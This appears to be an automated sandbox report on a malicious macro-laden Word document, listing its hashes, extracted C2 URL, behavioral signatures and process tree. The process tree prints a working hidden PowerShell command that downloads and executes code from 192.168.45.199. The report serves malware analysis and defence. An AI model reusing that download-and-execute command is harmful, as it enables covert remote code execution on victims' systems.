Analysis
-
max time kernel
53s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/11/2024, 01:19
Behavioral task
behavioral1
Sample
42e6ba1ea816c43320ae4eb3952059263348072339b75e9200a3914b510b044a.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
42e6ba1ea816c43320ae4eb3952059263348072339b75e9200a3914b510b044a.doc
Resource
win10v2004-20241007-en
General
-
Target
42e6ba1ea816c43320ae4eb3952059263348072339b75e9200a3914b510b044a.doc
-
Size
32KB
-
MD5
bb54172287fd2b0e410c5028d561b185
-
SHA1
e805b5ed52dd4371c8c1fb8cf7458bc84a4a2630
-
SHA256
42e6ba1ea816c43320ae4eb3952059263348072339b75e9200a3914b510b044a
-
SHA512
05c8929310cc38a0f97b354c6ff4f1b19ae8f39f647d2cdf423dc397625c19f473e3e167dc956a25fead95f44d659444d917ac09b6e69af948aa2941c73ecaa7
-
SSDEEP
192:IxSNOlLZEvA+6/6r8px8SmvowzxT4rKVrWGlAtno5hdbeCdCicDlg0jT4V2Iwa:E8iS8px8SMDEyrjStuhdbXdCRlg0jEc
Malware Config
Extracted
http://192.168.45.199/health
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 2884 powershell.exe 30 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2632 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2056 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2056 WINWORD.EXE 2056 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2056 wrote to memory of 1728 2056 WINWORD.EXE 34 PID 2056 wrote to memory of 1728 2056 WINWORD.EXE 34 PID 2056 wrote to memory of 1728 2056 WINWORD.EXE 34 PID 2056 wrote to memory of 1728 2056 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\42e6ba1ea816c43320ae4eb3952059263348072339b75e9200a3914b510b044a.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.45.199/health'))1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632